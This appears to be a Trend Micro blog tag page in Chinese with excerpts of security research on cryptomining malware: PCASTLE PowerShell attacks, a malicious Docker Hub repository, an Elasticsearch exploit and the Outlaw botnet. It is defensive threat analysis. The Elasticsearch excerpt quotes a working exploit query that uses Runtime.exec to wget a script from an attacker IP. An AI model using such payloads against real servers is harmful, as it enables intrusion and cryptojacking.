標籤: 虛擬貨幣

PCASTLE門羅幣挖礦病毒利用無檔案技術,再次針對中國發動攻擊

趨勢科技 TrendMicro

這張圖片的 alt 屬性值為空,它的檔案名稱為 feature_cybercrime-300x300.jpg

利用PowerShell散播惡意軟體並不件新鮮事;事實上,有許多無檔案病毒(fileless malware)都使用了這種作法。我們經常會看到這類型的威脅,趨勢科技的行為監控技術也能夠加以主動偵測和封鎖。比方說我們有智慧型特徵碼能夠主動偵測惡意PowerShell腳本所建立的排程工作。我們還有網路層規則來偵測SMB漏洞攻擊、暴力破解攻擊和非法虛擬貨幣挖礦( coinmining )連線等惡意活動。

不過這些活動的突然飆升仍然並不常見。根據趨勢科技 Smart Protection Suites反饋資料顯示,最近出現了一波針對中國的攻擊。攻擊活動在5月17日發現,現在仍在進行中;在5月22日到達顛峰後就一直保持穩定。

進一步分析後讓我們認為這些都屬於同一波的攻擊活動,行為模式跟之前用混淆PowerShell腳本(名為PCASTLE)散播門羅幣挖礦病毒的攻擊類似。但前一波的攻擊已經擴散到了日本、澳洲、台灣、越南、香港和印度等其他地區。現在似乎正將目標再度針對中國,跟之前被報導的首波攻擊一樣。

這波新攻擊使用了一些新手法。首先,它用了多個進行不同工作的組件來以各種方式散播虛擬貨幣挖礦病毒。它還使用了多層的無檔案技術,透過惡意PowerShell腳本下載其他病毒(通過排程工作)並只在記憶體內執行。最終的PowerShell腳本也是在記憶體內執行,用來進行所有的惡意行為:SMB漏洞攻擊(EternalBlue(永恆之藍))、暴力破解、傳遞雜湊(pass-the-hash)攻擊及下載其他病毒。

繼續閱讀

惡意虛擬貨幣挖礦容器,針對暴露API 的 Docker主機,並用 Shodan 找出其他受害目標

趨勢科技 TrendMicro
這張圖片的 alt 屬性值為空,它的檔案名稱為 feature_vul-200x200.jpg

趨勢科技架設了一台機器模擬Docker主機來監控針對容器的惡意活動,這個蜜罐系統的主機有著對外暴露的API,這是容器相關威脅最常攻擊的目標之一。我們的目標是透過監控蜜罐系統來偵測是否有人找到它並用來部署有問題的容器,最終希望可以找出攻擊的源頭。我們最近檢查了蜜罐狀態,發現已經有容器被部署進去。

分析蜜罐系統的日誌和流量資料後發現此容器來自名為zoolu2的公開(因此可以連上)Docker Hub儲存庫。檢查並下載儲存庫的內容後,我們發現它包含了9個映像,裡面含有客製化shell、Python腳本、設定檔,還有Shodan和虛擬貨幣挖礦程式。請注意,Docker自己也發現了此儲存庫,並在本文撰寫時已經讓其離線。

zoolu2儲存庫內的所有映像都包含了門羅幣(XMR)挖礦程式。這引起了我們的興趣,因為我們之前看過了將容器部署成礦工。此外,有些映像包含了列出有對外暴露API Docker主機的Shodan腳本,我們推測這些腳本是用來找出進一步散播的目標。

Figure 1. The zoolu2 Docker Hub repository

圖1. zoolu2 Docker Hub儲存庫

繼續閱讀

虛擬貨幣病毒透過 Elasticsearch 舊漏洞散播

趨勢科技 TrendMicro

趨勢科技曾在蜜罐系統上發現了關於搜尋引擎 Elasticsearch (用Lucene程式庫開發的開放原始碼Java搜尋引擎)的惡意挖礦( coinmining )活動。這波攻擊利用了漏洞CVE-2015-1427(位在Groovy 腳本引擎,讓遠端攻擊者可以用特製腳本來執行任意 shell 命令)以及CVE-2014-320(Elasticsearch預設設定內的漏洞)。Elasticsearch已經不再支援有漏洞的版本。

我們在運行Elasticsearch的伺服器上發現帶有以下命令的查詢(ISC也在一篇文章中提到):

“{“lupin”:{“script”: “java.lang.Math.class.forName(\”java.lang.Runtime\”).getRuntime().exec(\”wget hxxp://69[.]30[.]203[.]170/gLmwDU86r9pM3rXf/update.sh -P

/tmp/sssooo\”).getText()”}}}”

這命令是由同個系統/攻擊主機執行,後續病毒也是放在此主機上。在本文編寫時,使用此IP的是網域matrixhazel[.]com(無法連上)。此系統安裝的是CentOS 6,同時運行了網頁伺服器和SSH伺服器。

Figure 1. GreyNoise marked the host as a known scanner

圖1、GreyNotes將此這主機標記為已知掃描器

 

要注意的是,這種攻擊並不新鮮,只是最近又重新出現。趨勢科技的Smart Protection Network 11月在多個地區偵測到虛擬貨幣挖礦病毒,包括了台灣、中國和美國。

挖礦病毒散播bash腳本update.sh的方式是先調用shell來下載並輸出成檔案“/tmp/sssooo“(因為大多數系統對/tmp的限制較少)。

這種攻擊簡單卻會對受害者產生重大的影響。一旦攻擊者可以在系統上執行任意命令,就可以提升權限,甚至將目標轉向其他系統來進一步地入侵網路。

還應該注意的是,雖然大多數案例的攻擊手法相同,但所使用的惡意檔案可能不同。在我們所分析的案例中,使用的是update.sh。一但執行腳本update.sh就會下載檔案devtoolsconfig.json。接著就會部署虛擬貨幣挖礦病毒(趨勢科技偵測為 Coinminer.Linux.MALXMR.UWEIS)。 繼續閱讀

Outlaw駭客集團散播殭屍網路來進行虛擬貨幣挖礦、網路掃描和暴力破解

趨勢科技 TrendMicro

趨勢科技在之前發表過使用IRC殭屍網路的Outlaw駭客集團。而本篇文章將會繼續介紹該集團殭屍網路的主機部分,我們發現它試圖在我們的IoT蜜罐系統上執行腳本。殭屍網路利用工具 – haiduc在網路上找尋目標並用常見的命令注入漏洞來進行攻擊。一旦成功就會在目標系統上執行腳本min.sh(趨勢科技偵測為Coinminer.SH.MALXMR.ATNJ)。

我們這次發現兩個版本的Outlaw變種。第一個版本所用的腳本有兩個功能:挖礦程式和Haiduc工具。挖礦程式也有兩種格式。一種是純文字的bash/Perl腳本,另一種是混淆過的Perl腳本來避免被內容檢測入侵防禦系統(IPS)/防火牆所偵測。

而第二個版本主要是用於暴力破解,並且會進一步攻擊Microsoft遠端桌面協定和雲端管理cPanel來提升權限。而伺服器列表也顯示出漏洞攻擊的意圖,這份列表內的伺服器執行著有已知漏洞的程式庫libc.so.6。

 

第一個版本變種概述

下載的挖礦程式會用同時可在Linux和Android上執行的程式來挖掘門羅幣。這支挖礦程式會先檢查系統上是否有其他執行中的挖礦程式。如果發現,此腳本就會終止之前挖礦程式並執行自己的程式。這表示這隻殭屍程式可以劫持其他殭屍網路的挖礦活動。要注意的是,有些Mirai變種也具有相同的功能,但跟某些Mirai變種不同的是,這隻殭屍程式不會修補受害者來保護他們避免被再次感染。

開始挖礦後,殭屍網路會檢查程序列表來確認挖礦程式確實在執行中。如果沒有,就會再次下載惡意檔案並重新啟動挖礦程序(包括檢查是否存在其他挖礦程式)。

此過程讓駭客可以從其他攻擊者手上偷走入侵的挖礦主機,並用更新版本的挖礦程式來重新感染主機,能夠在這些攻擊者的XMR錢包被劫持後繼續運作。

一旦開始進行挖礦,挖礦程式就會回報給放有隨機名稱PHP腳本的被入侵網站。

腳本的另一功能負責散播殭屍網路。它所使用的是haiduc,我們之前就注意到它是Outlaw駭客集團主要使用的工具。這支haiduc工具會先暴力攻擊運行SSH服務的有漏洞主機。它所用的列表以PHP腳本形式放在被入侵網站上。一旦暴力破解成功,就會執行擴散殭屍網路的命令。它會安裝被入侵網站所提供的min.sh腳本。接著根據PHP腳本設定來掃描目標,並用電子郵件將結果寄給殭屍網路管理員(寫在其中一個PHP腳本內)。我們在之前的文章中提到此集團會利用IRC bot來形成殭屍網路,但這次是利用PHP來控制殭屍網路。不過挖礦程式和haiduc工具仍來自同一組織。

殭屍網路會從hxxp://www[.]karaibe.us/.foo/min.sh下載惡意shell腳本。奇怪的是,該網域會在原始碼中嵌入Google Analytics腳本,可能是為了讓殭屍網路管理員監控攻擊活動。目前此網域會被導到籃球聯賽積分榜網站。Outlaw駭客集團一直都使用著此項技術,並且很明顯地,透過PHP漏洞攻擊更多網站來取得新的C&C或內容派送伺服器是他們的核心活動之一。 繼續閱讀

挖礦病毒隱身術再進化,利用 Windows Installer 躲避偵測

趨勢科技 TrendMicro

虛擬貨幣挖礦病毒的驚人成長不只是因為它能夠賺錢的潛力,也因為它可以待在系統內不被發現,特別使用了各種混淆技術。對許多駭客來說,讓惡意軟體保持隱形而難以被偵測是必須面對的課題,以趨勢科技發現新的挖礦病毒: Coinminer.Win32.MALXMR.TIAOODAM為例,它便會使用多種混淆和封裝新技術。

安裝行為

Figure 1. Infection chain for the malware

圖1、惡意軟體感染鏈

繼續閱讀